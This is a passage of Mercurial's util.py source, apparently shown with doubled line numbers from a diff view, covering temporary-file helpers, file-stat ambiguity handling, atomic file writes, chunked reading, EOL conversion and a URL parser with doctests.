1925 1925 If the temporary file is going to be truncated immediately, you
1926 1926 can use emptyok=True as an optimization.
1927 1927
1928 1928 Returns the name of the temporary file.
1929 1929 """
1930 1930 d, fn = os.path.split(name)
1931 1931 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1932 1932 os.close(fd)
1933 1933 # Temporary files are created with mode 0600, which is usually not
1934 1934 # what we want. If the original file already exists, just copy
1935 1935 # its mode. Otherwise, manually obey umask.
1936 1936 copymode(name, temp, createmode)
1937 1937 if emptyok:
1938 1938 return temp
1939 1939 try:
1940 1940 try:
1941 1941 ifp = posixfile(name, "rb")
1942 1942 except IOError as inst:
1943 1943 if inst.errno == errno.ENOENT:
1944 1944 return temp
1945 1945 if not getattr(inst, 'filename', None):
1946 1946 inst.filename = name
1947 1947 raise
1948 1948 ofp = posixfile(temp, "wb")
1949 1949 for chunk in filechunkiter(ifp):
1950 1950 ofp.write(chunk)
1951 1951 ifp.close()
1952 1952 ofp.close()
1953 1953 except: # re-raises
1954 1954 try:
1955 1955 os.unlink(temp)
1956 1956 except OSError:
1957 1957 pass
1958 1958 raise
1959 1959 return temp
1960 1960
1961 1961 class filestat(object):
1962 1962 """help to exactly detect change of a file
1963 1963
1964 1964 'stat' attribute is result of 'os.stat()' if specified 'path'
1965 1965 exists. Otherwise, it is None. This can avoid preparative
1966 1966 'exists()' examination on client side of this class.
1967 1967 """
1968 1968 def __init__(self, stat):
1969 1969 self.stat = stat
1970 1970
1971 1971 @classmethod
1972 1972 def frompath(cls, path):
1973 1973 try:
1974 1974 stat = os.stat(path)
1975 1975 except OSError as err:
1976 1976 if err.errno != errno.ENOENT:
1977 1977 raise
1978 1978 stat = None
1979 1979 return cls(stat)
1980 1980
1981 1981 @classmethod
1982 1982 def fromfp(cls, fp):
1983 1983 stat = os.fstat(fp.fileno())
1984 1984 return cls(stat)
1985 1985
1986 1986 __hash__ = object.__hash__
1987 1987
1988 1988 def __eq__(self, old):
1989 1989 try:
1990 1990 # if ambiguity between stat of new and old file is
1991 1991 # avoided, comparison of size, ctime and mtime is enough
1992 1992 # to exactly detect change of a file regardless of platform
1993 1993 return (self.stat.st_size == old.stat.st_size and
1994 1994 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1995 1995 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1996 1996 except AttributeError:
1997 1997 pass
1998 1998 try:
1999 1999 return self.stat is None and old.stat is None
2000 2000 except AttributeError:
2001 2001 return False
2002 2002
2003 2003 def isambig(self, old):
2004 2004 """Examine whether new (= self) stat is ambiguous against old one
2005 2005
2006 2006 "S[N]" below means stat of a file at N-th change:
2007 2007
2008 2008 - S[n-1].ctime < S[n].ctime: can detect change of a file
2009 2009 - S[n-1].ctime == S[n].ctime
2010 2010 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2011 2011 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2012 2012 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2013 2013 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2014 2014
2015 2015 Case (*2) above means that a file was changed twice or more at
2016 2016 same time in sec (= S[n-1].ctime), and comparison of timestamp
2017 2017 is ambiguous.
2018 2018
2019 2019 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2020 2020 timestamp is ambiguous".
2021 2021
2022 2022 But advancing mtime only in case (*2) doesn't work as
2023 2023 expected, because naturally advanced S[n].mtime in case (*1)
2024 2024 might be equal to manually advanced S[n-1 or earlier].mtime.
2025 2025
2026 2026 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2027 2027 treated as ambiguous regardless of mtime, to avoid overlooking
2028 2028 by confliction between such mtime.
2029 2029
2030 2030 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2031 2031 S[n].mtime", even if size of a file isn't changed.
2032 2032 """
2033 2033 try:
2034 2034 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2035 2035 except AttributeError:
2036 2036 return False
2037 2037
2038 2038 def avoidambig(self, path, old):
2039 2039 """Change file stat of specified path to avoid ambiguity
2040 2040
2041 2041 'old' should be previous filestat of 'path'.
2042 2042
2043 2043 This skips avoiding ambiguity, if a process doesn't have
2044 2044 appropriate privileges for 'path'. This returns False in this
2045 2045 case.
2046 2046
2047 2047 Otherwise, this returns True, as "ambiguity is avoided".
2048 2048 """
2049 2049 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2050 2050 try:
2051 2051 os.utime(path, (advanced, advanced))
2052 2052 except OSError as inst:
2053 2053 if inst.errno == errno.EPERM:
2054 2054 # utime() on the file created by another user causes EPERM,
2055 2055 # if a process doesn't have appropriate privileges
2056 2056 return False
2057 2057 raise
2058 2058 return True
2059 2059
2060 2060 def __ne__(self, other):
2061 2061 return not self == other
2062 2062
2063 2063 class atomictempfile(object):
2064 2064 '''writable file object that atomically updates a file
2065 2065
2066 2066 All writes will go to a temporary copy of the original file. Call
2067 2067 close() when you are done writing, and atomictempfile will rename
2068 2068 the temporary copy to the original name, making the changes
2069 2069 visible. If the object is destroyed without being closed, all your
2070 2070 writes are discarded.
2071 2071
2072 2072 checkambig argument of constructor is used with filestat, and is
2073 2073 useful only if target file is guarded by any lock (e.g. repo.lock
2074 2074 or repo.wlock).
2075 2075 '''
2076 2076 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2077 2077 self.__name = name # permanent name
2078 2078 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2079 2079 createmode=createmode)
2080 2080 self._fp = posixfile(self._tempname, mode)
2081 2081 self._checkambig = checkambig
2082 2082
2083 2083 # delegated methods
2084 2084 self.read = self._fp.read
2085 2085 self.write = self._fp.write
2086 2086 self.seek = self._fp.seek
2087 2087 self.tell = self._fp.tell
2088 2088 self.fileno = self._fp.fileno
2089 2089
2090 2090 def close(self):
2091 2091 if not self._fp.closed:
2092 2092 self._fp.close()
2093 2093 filename = localpath(self.__name)
2094 2094 oldstat = self._checkambig and filestat.frompath(filename)
2095 2095 if oldstat and oldstat.stat:
2096 2096 rename(self._tempname, filename)
2097 2097 newstat = filestat.frompath(filename)
2098 2098 if newstat.isambig(oldstat):
2099 2099 # stat of changed file is ambiguous to original one
2100 2100 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2101 2101 os.utime(filename, (advanced, advanced))
2102 2102 else:
2103 2103 rename(self._tempname, filename)
2104 2104
2105 2105 def discard(self):
2106 2106 if not self._fp.closed:
2107 2107 try:
2108 2108 os.unlink(self._tempname)
2109 2109 except OSError:
2110 2110 pass
2111 2111 self._fp.close()
2112 2112
2113 2113 def __del__(self):
2114 2114 if safehasattr(self, '_fp'): # constructor actually did something
2115 2115 self.discard()
2116 2116
2117 2117 def __enter__(self):
2118 2118 return self
2119 2119
2120 2120 def __exit__(self, exctype, excvalue, traceback):
2121 2121 if exctype is not None:
2122 2122 self.discard()
2123 2123 else:
2124 2124 self.close()
2125 2125
2126 2126 def unlinkpath(f, ignoremissing=False, rmdir=True):
2127 2127 """unlink and remove the directory if it is empty"""
2128 2128 if ignoremissing:
2129 2129 tryunlink(f)
2130 2130 else:
2131 2131 unlink(f)
2132 2132 if rmdir:
2133 2133 # try removing directories that might now be empty
2134 2134 try:
2135 2135 removedirs(os.path.dirname(f))
2136 2136 except OSError:
2137 2137 pass
2138 2138
2139 2139 def tryunlink(f):
2140 2140 """Attempt to remove a file, ignoring ENOENT errors."""
2141 2141 try:
2142 2142 unlink(f)
2143 2143 except OSError as e:
2144 2144 if e.errno != errno.ENOENT:
2145 2145 raise
2146 2146
2147 2147 def makedirs(name, mode=None, notindexed=False):
2148 2148 """recursive directory creation with parent mode inheritance
2149 2149
2150 2150 Newly created directories are marked as "not to be indexed by
2151 2151 the content indexing service", if ``notindexed`` is specified
2152 2152 for "write" mode access.
2153 2153 """
2154 2154 try:
2155 2155 makedir(name, notindexed)
2156 2156 except OSError as err:
2157 2157 if err.errno == errno.EEXIST:
2158 2158 return
2159 2159 if err.errno != errno.ENOENT or not name:
2160 2160 raise
2161 2161 parent = os.path.dirname(os.path.abspath(name))
2162 2162 if parent == name:
2163 2163 raise
2164 2164 makedirs(parent, mode, notindexed)
2165 2165 try:
2166 2166 makedir(name, notindexed)
2167 2167 except OSError as err:
2168 2168 # Catch EEXIST to handle races
2169 2169 if err.errno == errno.EEXIST:
2170 2170 return
2171 2171 raise
2172 2172 if mode is not None:
2173 2173 os.chmod(name, mode)
2174 2174
2175 2175 def readfile(path):
2176 2176 with open(path, 'rb') as fp:
2177 2177 return fp.read()
2178 2178
2179 2179 def writefile(path, text):
2180 2180 with open(path, 'wb') as fp:
2181 2181 fp.write(text)
2182 2182
2183 2183 def appendfile(path, text):
2184 2184 with open(path, 'ab') as fp:
2185 2185 fp.write(text)
2186 2186
2187 2187 class chunkbuffer(object):
2188 2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2189 2189 iterator over chunks of arbitrary size."""
2190 2190
2191 2191 def __init__(self, in_iter):
2192 2192 """in_iter is the iterator that's iterating over the input chunks."""
2193 2193 def splitbig(chunks):
2194 2194 for chunk in chunks:
2195 2195 if len(chunk) > 2**20:
2196 2196 pos = 0
2197 2197 while pos < len(chunk):
2198 2198 end = pos + 2 ** 18
2199 2199 yield chunk[pos:end]
2200 2200 pos = end
2201 2201 else:
2202 2202 yield chunk
2203 2203 self.iter = splitbig(in_iter)
2204 2204 self._queue = collections.deque()
2205 2205 self._chunkoffset = 0
2206 2206
2207 2207 def read(self, l=None):
2208 2208 """Read L bytes of data from the iterator of chunks of data.
2209 2209 Returns less than L bytes if the iterator runs dry.
2210 2210
2211 2211 If size parameter is omitted, read everything"""
2212 2212 if l is None:
2213 2213 return ''.join(self.iter)
2214 2214
2215 2215 left = l
2216 2216 buf = []
2217 2217 queue = self._queue
2218 2218 while left > 0:
2219 2219 # refill the queue
2220 2220 if not queue:
2221 2221 target = 2**18
2222 2222 for chunk in self.iter:
2223 2223 queue.append(chunk)
2224 2224 target -= len(chunk)
2225 2225 if target <= 0:
2226 2226 break
2227 2227 if not queue:
2228 2228 break
2229 2229
2230 2230 # The easy way to do this would be to queue.popleft(), modify the
2231 2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2232 2232 # where we read partial chunk content, this incurs 2 dequeue
2233 2233 # mutations and creates a new str for the remaining chunk in the
2234 2234 # queue. Our code below avoids this overhead.
2235 2235
2236 2236 chunk = queue[0]
2237 2237 chunkl = len(chunk)
2238 2238 offset = self._chunkoffset
2239 2239
2240 2240 # Use full chunk.
2241 2241 if offset == 0 and left >= chunkl:
2242 2242 left -= chunkl
2243 2243 queue.popleft()
2244 2244 buf.append(chunk)
2245 2245 # self._chunkoffset remains at 0.
2246 2246 continue
2247 2247
2248 2248 chunkremaining = chunkl - offset
2249 2249
2250 2250 # Use all of unconsumed part of chunk.
2251 2251 if left >= chunkremaining:
2252 2252 left -= chunkremaining
2253 2253 queue.popleft()
2254 2254 # offset == 0 is enabled by block above, so this won't merely
2255 2255 # copy via ``chunk[0:]``.
2256 2256 buf.append(chunk[offset:])
2257 2257 self._chunkoffset = 0
2258 2258
2259 2259 # Partial chunk needed.
2260 2260 else:
2261 2261 buf.append(chunk[offset:offset + left])
2262 2262 self._chunkoffset += left
2263 2263 left -= chunkremaining
2264 2264
2265 2265 return ''.join(buf)
2266 2266
2267 2267 def filechunkiter(f, size=131072, limit=None):
2268 2268 """Create a generator that produces the data in the file size
2269 2269 (default 131072) bytes at a time, up to optional limit (default is
2270 2270 to read all data). Chunks may be less than size bytes if the
2271 2271 chunk is the last chunk in the file, or the file is a socket or
2272 2272 some other type of file that sometimes reads less data than is
2273 2273 requested."""
2274 2274 assert size >= 0
2275 2275 assert limit is None or limit >= 0
2276 2276 while True:
2277 2277 if limit is None:
2278 2278 nbytes = size
2279 2279 else:
2280 2280 nbytes = min(limit, size)
2281 2281 s = nbytes and f.read(nbytes)
2282 2282 if not s:
2283 2283 break
2284 2284 if limit:
2285 2285 limit -= len(s)
2286 2286 yield s
2287 2287
2288 2288 class cappedreader(object):
2289 2289 """A file object proxy that allows reading up to N bytes.
2290 2290
2291 2291 Given a source file object, instances of this type allow reading up to
2292 2292 N bytes from that source file object. Attempts to read past the allowed
2293 2293 limit are treated as EOF.
2294 2294
2295 2295 It is assumed that I/O is not performed on the original file object
2296 2296 in addition to I/O that is performed by this instance. If there is,
2297 2297 state tracking will get out of sync and unexpected results will ensue.
2298 2298 """
2299 2299 def __init__(self, fh, limit):
2300 2300 """Allow reading up to <limit> bytes from <fh>."""
2301 2301 self._fh = fh
2302 2302 self._left = limit
2303 2303
2304 2304 def read(self, n=-1):
2305 2305 if not self._left:
2306 2306 return b''
2307 2307
2308 2308 if n < 0:
2309 2309 n = self._left
2310 2310
2311 2311 data = self._fh.read(min(n, self._left))
2312 2312 self._left -= len(data)
2313 2313 assert self._left >= 0
2314 2314
2315 2315 return data
2316 2316
2317 2317 def readinto(self, b):
2318 2318 res = self.read(len(b))
2319 2319 if res is None:
2320 2320 return None
2321 2321
2322 2322 b[0:len(res)] = res
2323 2323 return len(res)
2324 2324
2325 2325 def unitcountfn(*unittable):
2326 2326 '''return a function that renders a readable count of some quantity'''
2327 2327
2328 2328 def go(count):
2329 2329 for multiplier, divisor, format in unittable:
2330 2330 if abs(count) >= divisor * multiplier:
2331 2331 return format % (count / float(divisor))
2332 2332 return unittable[-1][2] % count
2333 2333
2334 2334 return go
2335 2335
2336 2336 def processlinerange(fromline, toline):
2337 2337 """Check that linerange <fromline>:<toline> makes sense and return a
2338 2338 0-based range.
2339 2339
2340 2340 >>> processlinerange(10, 20)
2341 2341 (9, 20)
2342 2342 >>> processlinerange(2, 1)
2343 2343 Traceback (most recent call last):
2344 2344 ...
2345 2345 ParseError: line range must be positive
2346 2346 >>> processlinerange(0, 5)
2347 2347 Traceback (most recent call last):
2348 2348 ...
2349 2349 ParseError: fromline must be strictly positive
2350 2350 """
2351 2351 if toline - fromline < 0:
2352 2352 raise error.ParseError(_("line range must be positive"))
2353 2353 if fromline < 1:
2354 2354 raise error.ParseError(_("fromline must be strictly positive"))
2355 2355 return fromline - 1, toline
2356 2356
2357 2357 bytecount = unitcountfn(
2358 2358 (100, 1 << 30, _('%.0f GB')),
2359 2359 (10, 1 << 30, _('%.1f GB')),
2360 2360 (1, 1 << 30, _('%.2f GB')),
2361 2361 (100, 1 << 20, _('%.0f MB')),
2362 2362 (10, 1 << 20, _('%.1f MB')),
2363 2363 (1, 1 << 20, _('%.2f MB')),
2364 2364 (100, 1 << 10, _('%.0f KB')),
2365 2365 (10, 1 << 10, _('%.1f KB')),
2366 2366 (1, 1 << 10, _('%.2f KB')),
2367 2367 (1, 1, _('%.0f bytes')),
2368 2368 )
2369 2369
2370 2370 class transformingwriter(object):
2371 2371 """Writable file wrapper to transform data by function"""
2372 2372
2373 2373 def __init__(self, fp, encode):
2374 2374 self._fp = fp
2375 2375 self._encode = encode
2376 2376
2377 2377 def close(self):
2378 2378 self._fp.close()
2379 2379
2380 2380 def flush(self):
2381 2381 self._fp.flush()
2382 2382
2383 2383 def write(self, data):
2384 2384 return self._fp.write(self._encode(data))
2385 2385
2386 2386 # Matches a single EOL which can either be a CRLF where repeated CR
2387 2387 # are removed or a LF. We do not care about old Macintosh files, so a
2388 2388 # stray CR is an error.
2389 2389 _eolre = remod.compile(br'\r*\n')
2390 2390
2391 2391 def tolf(s):
2392 2392 return _eolre.sub('\n', s)
2393 2393
2394 2394 def tocrlf(s):
2395 2395 return _eolre.sub('\r\n', s)
2396 2396
2397 2397 def _crlfwriter(fp):
2398 2398 return transformingwriter(fp, tocrlf)
2399 2399
2400 2400 if pycompat.oslinesep == '\r\n':
2401 2401 tonativeeol = tocrlf
2402 2402 fromnativeeol = tolf
2403 2403 nativeeolwriter = _crlfwriter
2404 2404 else:
2405 2405 tonativeeol = pycompat.identity
2406 2406 fromnativeeol = pycompat.identity
2407 2407 nativeeolwriter = pycompat.identity
2408 2408
2409 2409 if (pyplatform.python_implementation() == 'CPython' and
2410 2410 sys.version_info < (3, 0)):
2411 2411 # There is an issue in CPython that some IO methods do not handle EINTR
2412 2412 # correctly. The following table shows what CPython version (and functions)
2413 2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2414 2414 #
2415 2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2416 2416 # --------------------------------------------------
2417 2417 # fp.__iter__ | buggy | buggy | okay
2418 2418 # fp.read* | buggy | okay [1] | okay
2419 2419 #
2420 2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2421 2421 #
2422 2422 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2423 2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2424 2424 #
2425 2425 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2426 2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2427 2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2428 2428 # fp.__iter__ but not other fp.read* methods.
2429 2429 #
2430 2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2431 2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2432 2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2433 2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2434 2434 # to minimize the performance impact.
2435 2435 if sys.version_info >= (2, 7, 4):
2436 2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2437 2437 def _safeiterfile(fp):
2438 2438 return iter(fp.readline, '')
2439 2439 else:
2440 2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2441 2441 # note: this may block longer than necessary because of bufsize.
2442 2442 def _safeiterfile(fp, bufsize=4096):
2443 2443 fd = fp.fileno()
2444 2444 line = ''
2445 2445 while True:
2446 2446 try:
2447 2447 buf = os.read(fd, bufsize)
2448 2448 except OSError as ex:
2449 2449 # os.read only raises EINTR before any data is read
2450 2450 if ex.errno == errno.EINTR:
2451 2451 continue
2452 2452 else:
2453 2453 raise
2454 2454 line += buf
2455 2455 if '\n' in buf:
2456 2456 splitted = line.splitlines(True)
2457 2457 line = ''
2458 2458 for l in splitted:
2459 2459 if l[-1] == '\n':
2460 2460 yield l
2461 2461 else:
2462 2462 line = l
2463 2463 if not buf:
2464 2464 break
2465 2465 if line:
2466 2466 yield line
2467 2467
2468 2468 def iterfile(fp):
2469 2469 fastpath = True
2470 2470 if type(fp) is file:
2471 2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2472 2472 if fastpath:
2473 2473 return fp
2474 2474 else:
2475 2475 return _safeiterfile(fp)
2476 2476 else:
2477 2477 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2478 2478 def iterfile(fp):
2479 2479 return fp
2480 2480
2481 2481 def iterlines(iterator):
2482 2482 for chunk in iterator:
2483 2483 for line in chunk.splitlines():
2484 2484 yield line
2485 2485
2486 2486 def expandpath(path):
2487 2487 return os.path.expanduser(os.path.expandvars(path))
2488 2488
2489 2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2490 2490 """Return the result of interpolating items in the mapping into string s.
2491 2491
2492 2492 prefix is a single character string, or a two character string with
2493 2493 a backslash as the first character if the prefix needs to be escaped in
2494 2494 a regular expression.
2495 2495
2496 2496 fn is an optional function that will be applied to the replacement text
2497 2497 just before replacement.
2498 2498
2499 2499 escape_prefix is an optional flag that allows using doubled prefix for
2500 2500 its escaping.
2501 2501 """
2502 2502 fn = fn or (lambda s: s)
2503 2503 patterns = '|'.join(mapping.keys())
2504 2504 if escape_prefix:
2505 2505 patterns += '|' + prefix
2506 2506 if len(prefix) > 1:
2507 2507 prefix_char = prefix[1:]
2508 2508 else:
2509 2509 prefix_char = prefix
2510 2510 mapping[prefix_char] = prefix_char
2511 2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2512 2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2513 2513
2514 2514 def getport(port):
2515 2515 """Return the port for a given network service.
2516 2516
2517 2517 If port is an integer, it's returned as is. If it's a string, it's
2518 2518 looked up using socket.getservbyname(). If there's no matching
2519 2519 service, error.Abort is raised.
2520 2520 """
2521 2521 try:
2522 2522 return int(port)
2523 2523 except ValueError:
2524 2524 pass
2525 2525
2526 2526 try:
2527 2527 return socket.getservbyname(pycompat.sysstr(port))
2528 2528 except socket.error:
2529 2529 raise error.Abort(_("no port number associated with service '%s'")
2530 2530 % port)
2531 2531
2532 2532 class url(object):
2533 2533 r"""Reliable URL parser.
2534 2534
2535 2535 This parses URLs and provides attributes for the following
2536 2536 components:
2537 2537
2538 2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2539 2539
2540 2540 Missing components are set to None. The only exception is
2541 2541 fragment, which is set to '' if present but empty.
2542 2542
2543 2543 If parsefragment is False, fragment is included in query. If
2544 2544 parsequery is False, query is included in path. If both are
2545 2545 False, both fragment and query are included in path.
2546 2546
2547 2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2548 2548
2549 2549 Note that for backward compatibility reasons, bundle URLs do not
2550 2550 take host names. That means 'bundle://../' has a path of '../'.
2551 2551
2552 2552 Examples:
2553 2553
2554 2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2555 2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2556 2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2557 2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2558 2558 >>> url(b'file:///home/joe/repo')
2559 2559 <url scheme: 'file', path: '/home/joe/repo'>
2560 2560 >>> url(b'file:///c:/temp/foo/')
2561 2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2562 2562 >>> url(b'bundle:foo')
2563 2563 <url scheme: 'bundle', path: 'foo'>
2564 2564 >>> url(b'bundle://../foo')
2565 2565 <url scheme: 'bundle', path: '../foo'>
2566 2566 >>> url(br'c:\foo\bar')
2567 2567 <url path: 'c:\\foo\\bar'>
2568 2568 >>> url(br'\\blah\blah\blah')
2569 2569 <url path: '\\\\blah\\blah\\blah'>
2570 2570 >>> url(br'\\blah\blah\blah#baz')
2571 2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2572 2572 >>> url(br'file:///C:\users\me')
2573 2573 <url scheme: 'file', path: 'C:\\users\\me'>
2574 2574
2575 2575 Authentication credentials:
2576 2576
2577 2577 >>> url(b'ssh://joe:xyz@x/repo')
2578 2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2579 2579 >>> url(b'ssh://joe@x/repo')
2580 2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2581 2581
2582 2582 Query strings and fragments:
2583 2583
2584 2584 >>> url(b'http://host/a?b#c')
2585 2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2586 2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2587 2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2588 2588
2589 2589 Empty path:
2590 2590
2591 2591 >>> url(b'')
2592 2592 <url path: ''>
2593 2593 >>> url(b'#a')
2594 2594 <url path: '', fragment: 'a'>
2595 2595 >>> url(b'http://host/')
2596 2596 <url scheme: 'http', host: 'host', path: ''>
2597 2597 >>> url(b'http://host/#a')
2598 2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2599 2599
2600 2600 Only scheme:
2601 2601
2602 2602 >>> url(b'http:')
2603 2603 <url scheme: 'http'>
2604 2604 """
2605 2605
2606 2606 _safechars = "!~*'()+"
2607 2607 _safepchars = "/!~*'()+:\\"
2608 2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2609 2609
2610 2610 def __init__(self, path, parsequery=True, parsefragment=True):
2611 2611 # We slowly chomp away at path until we have only the path left
2612 2612 self.scheme = self.user = self.passwd = self.host = None
2613 2613 self.port = self.path = self.query = self.fragment = None
2614 2614 self._localpath = True
2615 2615 self._hostport = ''
2616 2616 self._origpath = path
2617 2617
2618 2618 if parsefragment and '#' in path:
2619 2619 path, self.fragment = path.split('#', 1)
2620 2620
2621 2621 # special case for Windows drive letters and UNC paths
2622 2622 if hasdriveletter(path) or path.startswith('\\\\'):
2623 2623 self.path = path
2624 2624 return
2625 2625
2626 2626 # For compatibility reasons, we can't handle bundle paths as
2627 2627 # normal URLS
2628 2628 if path.startswith('bundle:'):
2629 2629 self.scheme = 'bundle'
2630 2630 path = path[7:]
2631 2631 if path.startswith('//'):
2632 2632 path = path[2:]
2633 2633 self.path = path
2634 2634 return
2635 2635
2636 2636 if self._matchscheme(path):
2637 2637 parts = path.split(':', 1)
2638 2638 if parts[0]:
2639 2639 self.scheme, path = parts
2640 2640 self._localpath = False
2641 2641
2642 2642 if not path:
2643 2643 path = None
2644 2644 if self._localpath:
2645 2645 self.path = ''
2646 2646 return
2647 2647 else:
2648 2648 if self._localpath:
2649 2649 self.path = path
2650 2650 return
2651 2651
2652 2652 if parsequery and '?' in path:
2653 2653 path, self.query = path.split('?', 1)
2654 2654 if not path:
2655 2655 path = None
2656 2656 if not self.query:
2657 2657 self.query = None
2658 2658
2659 2659 # // is required to specify a host/authority
2660 2660 if path and path.startswith('//'):
2661 2661 parts = path[2:].split('/', 1)
2662 2662 if len(parts) > 1:
2663 2663 self.host, path = parts
2664 2664 else:
2665 2665 self.host = parts[0]
2666 2666 path = None
2667 2667 if not self.host:
2668 2668 self.host = None
2669 2669 # path of file:///d is /d
2670 2670 # path of file:///d:/ is d:/, not /d:/
2671 2671 if path and not hasdriveletter(path):
2672 2672 path = '/' + path
2673 2673
2674 2674 if self.host and '@' in self.host:
2675 2675 self.user, self.host = self.host.rsplit('@', 1)
2676 2676 if ':' in self.user:
2677 2677 self.user, self.passwd = self.user.split(':', 1)
2678 2678 if not self.host:
2679 2679 self.host = None
2680 2680
2681 2681 # Don't split on colons in IPv6 addresses without ports
2682 2682 if (self.host and ':' in self.host and
2683 2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2684 2684 self._hostport = self.host
2685 2685 self.host, self.port = self.host.rsplit(':', 1)
2686 2686 if not self.host:
2687 2687 self.host = None
2688 2688
2689 2689 if (self.host and self.scheme == 'file' and
2690 2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2691 2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2692 2692
2693 2693 self.path = path
2694 2694
2695 2695 # leave the query string escaped
2696 2696 for a in ('user', 'passwd', 'host', 'port',
2697 2697 'path', 'fragment'):
2698 2698 v = getattr(self, a)
2699 2699 if v is not None:
2700 2700 setattr(self, a, urlreq.unquote(v))
2701 2701
2702 2702 @encoding.strmethod
2703 2703 def __repr__(self):
2704 2704 attrs = []
2705 2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2706 2706 'query', 'fragment'):
2707 2707 v = getattr(self, a)
2708 2708 if v is not None:
2709 2709 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2710 2710 return '<url %s>' % ', '.join(attrs)
2711 2711
2712 2712 def __bytes__(self):
2713 2713 r"""Join the URL's components back into a URL string.
2714 2714
2715 2715 Examples:
2716 2716
2717 2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2718 2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2719 2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2720 2720 'http://user:pw@host:80/?foo=bar&baz=42'
2721 2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2722 2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2723 2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2724 2724 'ssh://user:pw@[::1]:2200//home/joe#'
2725 2725 >>> bytes(url(b'http://localhost:80//'))
2726 2726 'http://localhost:80//'
2727 2727 >>> bytes(url(b'http://localhost:80/'))
2728 2728 'http://localhost:80/'
2729 2729 >>> bytes(url(b'http://localhost:80'))
2730 2730 'http://localhost:80/'
2731 2731 >>> bytes(url(b'bundle:foo'))
2732 2732 'bundle:foo'
2733 2733 >>> bytes(url(b'bundle://../foo'))
2734 2734 'bundle:../foo'
2735 2735 >>> bytes(url(b'path'))
2736 2736 'path'
2737 2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2738 2738 'file:///tmp/foo/bar'
2739 2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2740 2740 'file:///c:/tmp/foo/bar'
2741 2741 >>> print(url(br'bundle:foo\bar'))
2742 2742 bundle:foo\bar
2743 2743 >>> print(url(br'file:///D:\data\hg'))
2744 2744 file:///D:\data\hg
2745 2745 """
2746 2746 if self._localpath:
2747 2747 s = self.path
2748 2748 if self.scheme == 'bundle':
2749 2749 s = 'bundle:' + s
2750 2750 if self.fragment:
2751 2751 s += '#' + self.fragment
2752 2752 return s
2753 2753
2754 2754 s = self.scheme + ':'
2755 2755 if self.user or self.passwd or self.host:
2756 2756 s += '//'
2757 2757 elif self.scheme and (not self.path or self.path.startswith('/')
2758 2758 or hasdriveletter(self.path)):
2759 2759 s += '//'
2760 2760 if hasdriveletter(self.path):
2761 2761 s += '/'
2762 2762 if self.user:
2763 2763 s += urlreq.quote(self.user, safe=self._safechars)
2764 2764 if self.passwd:
2765 2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2766 2766 if self.user or self.passwd:
2767 2767 s += '@'
2768 2768 if self.host:
2769 2769 if not (self.host.startswith('[') and self.host.endswith(']')):
